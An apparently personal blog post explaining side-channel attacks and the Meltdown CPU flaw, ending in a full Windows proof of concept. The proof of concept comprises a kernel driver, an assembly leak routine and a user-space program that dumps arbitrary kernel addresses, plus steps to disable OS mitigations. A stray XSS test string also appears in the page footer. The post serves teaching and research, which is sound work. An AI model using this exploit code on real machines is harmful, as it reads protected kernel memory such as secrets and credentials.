Meltdown - How modern CPUs leak sensitive data by side channel attacks

What is a side channel attack

Modern hardwares usually implements lots of features to achieve better performance. However, such techniques can be used to leak sensitive data or even enabling attackers to control the system. Most of these attacking method is considered as side channel attacks, since they are using information outside of the information system.

The definition of side channel attack is as follows, referencing Wikipedia:

In computer security, a side-channel attack is any attack based on extra information that can be gathered because of the fundamental way a computer protocol or algorithm is implemented, rather than flaws in the design of the protocol or algorithm itself (e.g. flaws found in a cryptanalysis of a cryptographic algorithm) or minor, but potentially devastating, mistakes or oversights in the implementation. (Cryptanalysis also includes searching for side-channel attacks.) Timing information, power consumption, electromagnetic leaks, and sound are examples of extra information which could be exploited to facilitate side-channel attacks.

An example of side channel attack

From this article, we can see what a hardware side channel attack looks like, which I will be used as an example as follows.

Take a case that a password verification system used the code below.

int main(void)
{
  char passwd[32];
  char correct_passwd[] = "h0px3";
  my_read(passwd, 32);
  uint8_t passbad = 0;
  for (uint8_t i = 0; i < sizeof(correct_passwd); i++)
  {
    if (correct_passwd[i] != passwd[i])
    {
      passbad = 1;
      break;
    }
  }
  if (passbad)
  {
    my_puts("PASSWORD FAIL\n");
  }
  else
  {
    my_puts("Access granted, Welcome!\n");
  }
}

Inside of the for loop, it compared each bytes to see if it is identical. So if we input 'a' instead of 'h', the loop will break on the first try. However, when we input 'h', which is the correct character, the loop will continue to compare the second byte. Tricking the system with an oscilloscope attached at the power source of CPU, we can see the difference between each input.

Hence, we can guess each character, and by observing the voltage changes we can get the password. This attacking method is completely outside of the programming system, as it has nothing related with the code and algorithms apart from the energy consumption of its physical implementation.

Background of Meltdown attack

Meltdown, an attack using cache, published in 2018 with ID of CVE-2017-5754, considered as catastrophic because it breaks the isolation between user and kernel address space and the permission of memory protection which the "protected mode" designed for.

Cache

As all hardware vendors caring about performance, the cache had been introduced on modern CPUs, such as TLB(Transition Lookaside Buffer) in x86 architecture. For example, let's say accessing a 4-byte memory data need 100ns.

But when paging is enabled, the CPU needs to read at least 3 times to actually get the data it needed which can cost 300ns, because the CPU needs to translate the virtual address into physical, and the physical address of each page (A page is like a const-sized memory region) is located in another memory region.

So the TLB is introduced, when the program needs to access one page of data seveal times, such as an array, it can shorten the time of each access. Let's say we need to read an array of data for 10 times. The first reading cost 300ns, after which the physical address of the page is stored in TLB cache, so the CPU don't needs to read another 2 times to locate the address where the data contains. That is what cache means - to increase the performance and reducing the repeating operations.

Out-of-order execution

Out-of order execution is another technique to optimize the performance of CPU. In most cases, CPU run instructions in a parallel on different cores. Each core has its own caches and it will run the code instruction by instruction continuously by adding its own IP (Instruction Pointer), until is hits the conditional branching(jump) instruction, where the IP register will be set to a specific location. However, in practical system, the CPU would run as more instructions as it could, regardless of the previous instruction is finished.

This means, when a memory accessing instruction has been reached, the CPU would wait the memory returns and run instructions after it simultaneously. And when the memory returned value, the CPU would check the value to judge if the result of Out-of-order execution is correct or not.

During such process, the cache is also used. So the Meltdown attack used the properties of out-of-order execution and extract the data using cache attacks. However, when an exception is raised during the instruction, the CPU would not clear/flush the cache of the out-of-order execution produced. And to gain best performance, privileges of memory page will not be checked during the out-of-order execution. As a result, a potential vulnerability has been introduced.

Just as the paper of Meltdown says.

Even if a memory location is only accessed during out-of-order execution, it remains cached. Iterating over the 256 pages of probe array shows one cache hit, exactly on the page that was accessed during the outof-order execution.

Flush+Reload

When a cache kicked in, all data will go through it. So if the program accessed the address, the address and value of it will be stored in cache. Then an attack could use such technique to extract the data from cache.

First thing the attacker would do is flush all cache, to make sure only target accessing be cached. Then, when target "touch" the memory region with certain operations, the region would be cached. Hence, the attacker could read every byte to learn which region the victim accessed by measuring the time of reading.

That is because reading from cache is significantly faster than reading from memory, as it shown in the paper of it.

Demonstration of the attack

Principle of the attack

As the background section discussed, we can use Flush+Reload technique with the out-of-order execution to make the attack possible. To use Flush+Reload, we need an array to receive the data sent by covert channel.

First is using clflush instruction to flush the cache of array. Then making an exception so that the program will never reach the instructions below the exception, but the CPU executed it out of order. These out-of-order instructions need to load target address data and send it to the attacker by accessing the array which the attacker flushed.

Then, we measure the time of each byte inside the array, to extract the data from covert channel. The attack is successful. So an example of the attack is as follows.

#include <iostream>
#include <windows.h>
#include <emmintrin.h>
#include <intrin.h>
#define PAGE_SIZE 4096

typedef unsigned char byte;

byte array[256 * PAGE_SIZE];

int main(){
    uint8_t target_data = 37;
    uint8_t junk;
    uint64_t time[256];
    // Clear cache
    for (int i = 0; i < 256; i++){
        _mm_clflush(&array[i * PAGE_SIZE]);
    }

    // Using Exception Handler
    __try {
        *(int*)0 = 0; // Access Violation
        // Instruction below this line is executed out-of-order
        junk = array[target_data * PAGE_SIZE];
    }
    __except (GetExceptionCode() == EXCEPTION_ACCESS_VIOLATION) {
		// An access violation is expected.
	}

    // Now the address of &array[target_data] is cached
    uint64_t minTime = 0xFFFF;
    int leak;
    for (int i = 0; i < 256; i++) {
        int aux[4];
	uint64_t t1 = __rdtsc();
        junk = array[i * PAGE_SIZE];
        rand(); // A function to ensure that CPU won't run __rdtsc below out-of-order.
	uint64_t t2 = __rdtsc() - t1;
	if (t2 < minTime) {
		minTime = t2;
		leak = i;
	}
        time[i] = t2;
    }

    std::cout << std::endl;
    std::cout << "The leaked target_data is " << leak << std::endl;

    return 0;
}

Disable the patch

Firstly, the attack has been patched long times ago, by both OS and CPU Microcode perspective, and KPTI(also known as KAISER) has been introduced to most systems, here is an example for linux kernel. So we needs to disable these security features first to achieve the attack. Here we need a freeware named InSpectre, and most importantly, we need a vulnerable processor.

For me, the result of testing shows my Laptop is vulnerable to Meltdown. However, according to Intel webpage, my processor is not vulnerable to meltdown. So the demonstration is currently not avaliable.

For example, the Skylake platform is vulnerable. So we can just disable the protection by clicking the button below.

DISCLAIMER: THIS ARTICLE IS EDUCATIONAL PURPOSE ONLY! THE OPERATION IS DANGEROUS TO YOUR SYSTEM. DO NOT DISABLE THE PROTECTION UNLESS YOU KNOW WHAT ARE YOU DOING. YOU ARE DOING THIS AT YOUR OWN RISK.

Creating our secret data to be leaked.

We need a driver to put our data into the system address space. Anyway, any data from kernel space can be leaked with or without the driver.

On driver sides, a system thread will loop through the secret data infinitely to cache the data into the process unit, which I set to be Core 1.

#include <ntifs.h>
#include <ntddk.h>
#define DebugPrint(fmt, ...) DbgPrintEx(0,0,"[BhDebug] " ## fmt ## "\n", __VA_ARGS__ )
#define SECRET_SIZE PAGE_SIZE
const char* secretData = "";
PVOID kAddr;
PETHREAD pThread;
bool isUnloading = false;

void DriverUnload(PDRIVER_OBJECT drvObj) {
	UNREFERENCED_PARAMETER(drvObj);
	isUnloading = true;
	DebugPrint("Driver UnLoaded. Thread Termination Signel: %d", isUnloading);
	KeWaitForSingleObject(pThread, Executive, KernelMode, TRUE, 0);
	ObDereferenceObject(pThread);
	MmFreeNonCachedMemory(kAddr, PAGE_SIZE);
	pThread = nullptr;
	kAddr = nullptr;
	return;
}

void Thread_Context(PVOID context) {
	UNREFERENCED_PARAMETER(context);
	UINT32 junk = 0;
	LARGE_INTEGER interval = { .QuadPart = -100000 };

	KeSetPriorityThread(KeGetCurrentThread(), LOW_REALTIME_PRIORITY);
	KeSetSystemAffinityThread(1);
	DebugPrint("Thread started.");

	while (!isUnloading) {
		for (size_t i = 0; i < PAGE_SIZE; i++) {
			junk ^= reinterpret_cast<UINT8*>(kAddr)[i];
			junk += 0x1337;
		}
		KeDelayExecutionThread(KernelMode, TRUE, &interval);
	}

	DebugPrint("Thread termination signal received.");

	PsTerminateSystemThread(STATUS_SUCCESS);
	KeBugCheck(0);
}

extern "C" NTSTATUS DriverEntry(PDRIVER_OBJECT pdo, PUNICODE_STRING pRegPath) {
	UNREFERENCED_PARAMETER(pRegPath);
	DebugPrint("Driver Loaded.");
	HANDLE hThread;
	pdo->DriverUnload = DriverUnload;
	kAddr = MmAllocateNonCachedMemory(PAGE_SIZE);
	if (kAddr == NULL) {
		return STATUS_FAILED_DRIVER_ENTRY;
	}
	memcpy_s(kAddr, PAGE_SIZE, secretData, PAGE_SIZE);

	if (PsCreateSystemThread(&hThread, THREAD_ALL_ACCESS, 0, 0, 0, Thread_Context, 0) != STATUS_SUCCESS) {
		MmFreeNonCachedMemory(kAddr, PAGE_SIZE);
		return STATUS_FAILED_DRIVER_ENTRY;
	}
	ObReferenceObjectByHandle(hThread, THREAD_ALL_ACCESS, NULL, KernelMode, (PVOID*)&pThread, NULL);
	ZwClose(hThread);
	DebugPrint("Secret Data Location: 0x%p", kAddr);
	return STATUS_SUCCESS;
}

Leaking the secret from user space

To make it easier for us to extract the data, we need to set the thread to run at Core 1, which is the same with the Driver thread. Then using SEH to handle the access violation exception, to continue the program flow.

In the exploit function, we trigger the meltdown to leak secret data into our cache.

.code
exploit proc

mov rax, qword ptr [0] ; raise an access violation exception
; Out of order execution starts.
retry:
movzx rcx, byte ptr [rcx] ; Read the data
shl rcx, 0Ch ; multiply rcx with the page size 4096
jz retry
mov rax, qword ptr [rcx+rdx] ; Push the data into cache

exploit endp
end

#include <iostream>
#include <windows.h>
#include <intrin.h>
#define PAGE_SIZE 4096

extern "C" void exploit(uintptr_t addr, void* array);

uint16_t Probe(uintptr_t addr, void* arr) {
	
	uint16_t leak = 0xFFFF;
	uint64_t minTime = 0xFF;

	// Clear cache
	for (size_t i = 0; i < 256; i++) {
		_mm_clflush(&reinterpret_cast<byte*>(arr)[i * PAGE_SIZE]);
	}
	
	// Using Exception Handler
	__try {
		exploit(addr, arr);
	}
	__except (GetExceptionCode() == EXCEPTION_ACCESS_VIOLATION) {
		// An access violation is expected.
	}
	
	for (size_t i = 1; i < 256; i++) {
		uint32_t avx;
		uint64_t t1 = __rdtscp(&avx);
		uint8_t junk = ((byte*)arr)[i * PAGE_SIZE];
		//junk = rand() & 0xFF;  // A function to ensure that CPU won't run __rdtsc below out-of-order.
					 // Uncomment if you want to use __rdtsc()
		uint64_t t2 = __rdtscp(&avx) - t1;
		
		if (t2 < minTime) {
			minTime = t2;
			leak = i;
		}
	}

	if (minTime < 100) {
		return leak;
	}
	return 0xFFFF; // highest byte indicate error
}

uint8_t MeltdownExtractOne(uintptr_t addr, void* arr) {
	size_t tryed = 0;
	do {
		uint16_t leak = Probe(addr, arr);
		if (!(leak & 0xFF00)) { // No Error
			return leak;
		}
		tryed++;
		_mm_pause();
	} while (tryed <= 99999); // Zzzzzzzzz
	
	return 0;
}

int main() {
	uintptr_t addr;
	size_t size;
	uintptr_t junk;
	SetProcessAffinityMask(GetCurrentProcess(), 1);
	void* arr = malloc(PAGE_SIZE * 256);

	printf("Meltdown demo.\nEnter any address in hexadecimal to leak data : ");
	scanf_s("0x%p", &addr);
	printf("Size: ");
	scanf_s("%ul", &size);

	putchar('\n');
	for (size_t i = 0; i < size; i++) {
		unsigned int retn = MeltdownExtractOne(addr + i, arr);
		printf("%02X", retn);
	}

	free(arr);

	return 0;
}

Summary

In the code above, we tried 99999 times until it hits 0. That is because the chance of hitting 0 is pretty high and need to be examined more often, according to the paper of meltdown. And the performance is vary from different processors. In some cases such as 6700k, the exploit can read non-cached data. But most cases it is difficult to contribute precise result without retrying.

The solution can be found at https://github.com/MTAwsl/Meltdown-PoC

A potential bypass?

During the process of writing this post, I found that this attack is available even if the processor is not affected by the meltdown in this code. Then I did some research after finding that it can be exploited. Turns out that address around the stack can be cached and will not be flushed during out-of-order execution, so I guess maybe by migrating the stack or just changing rsp/rbp, it would leak information on any address.

I didn't make it happen because of the exception handler doesn't allow me to modify the rsp/ebp value and I don't have much time to do more research since I am currently in a dangerous situation in my study. However, I will try to implement that in the future.

To security researcher that are reading this article, if you are interested in this topic and want to do more research, please consider to add me as your collaborator. Thank you.

References

Side-channel attack: https://en.wikipedia.org/wiki/Side-channel_attack
[原创]初探侧信道攻击：功耗分析爆破密码 https://bbs.pediy.com/thread-260429.htm
CVE-2017-5754: https://www.cve.org/CVERecord?id=CVE-2017-5754
Protected Mode: https://en.wikipedia.org/wiki/Protected_mode
TLB - Transition Lookaside Buffer: https://en.wikipedia.org/wiki/Translation_lookaside_buffer
Memory Paging: https://en.wikipedia.org/wiki/Memory_paging
KPTI(previously KAISER): https://gruss.cc/files/kaiser.pdf
GLEIXNER, T. x86/kpti: Kernel Page Table Isolation (was KAISER), https://lkml.org/lkml/2017/12/4/709 Dec 2017.
Meltdown: Reading Kernel Memory from User Space https://meltdownattack.com/meltdown.pdf
Spectre Attacks: Exploiting Speculative Execution https://spectreattack.com/spectre.pdf
YAROM, Y., AND FALKNER, K. Flush+Reload: a High Reso- lution, Low Noise, L3 Cache Side-Channel Attack. In USENIX Security Symposium (2014) https://www.usenix.org/system/files/conference/usenixsecurity14/sec14-paper-yarom.pdf
Affected Processors: Guidance for Security Issues on Intel® Processors: https://www.intel.com/content/www/us/en/developer/topic-technology/software-security-guidance/processors-affected-consolidated-product-cpu-model.html

Previous<script> alert("me"); </script>NextRust: The Greatest Innovation in Modern Programming

Last updated 8 months ago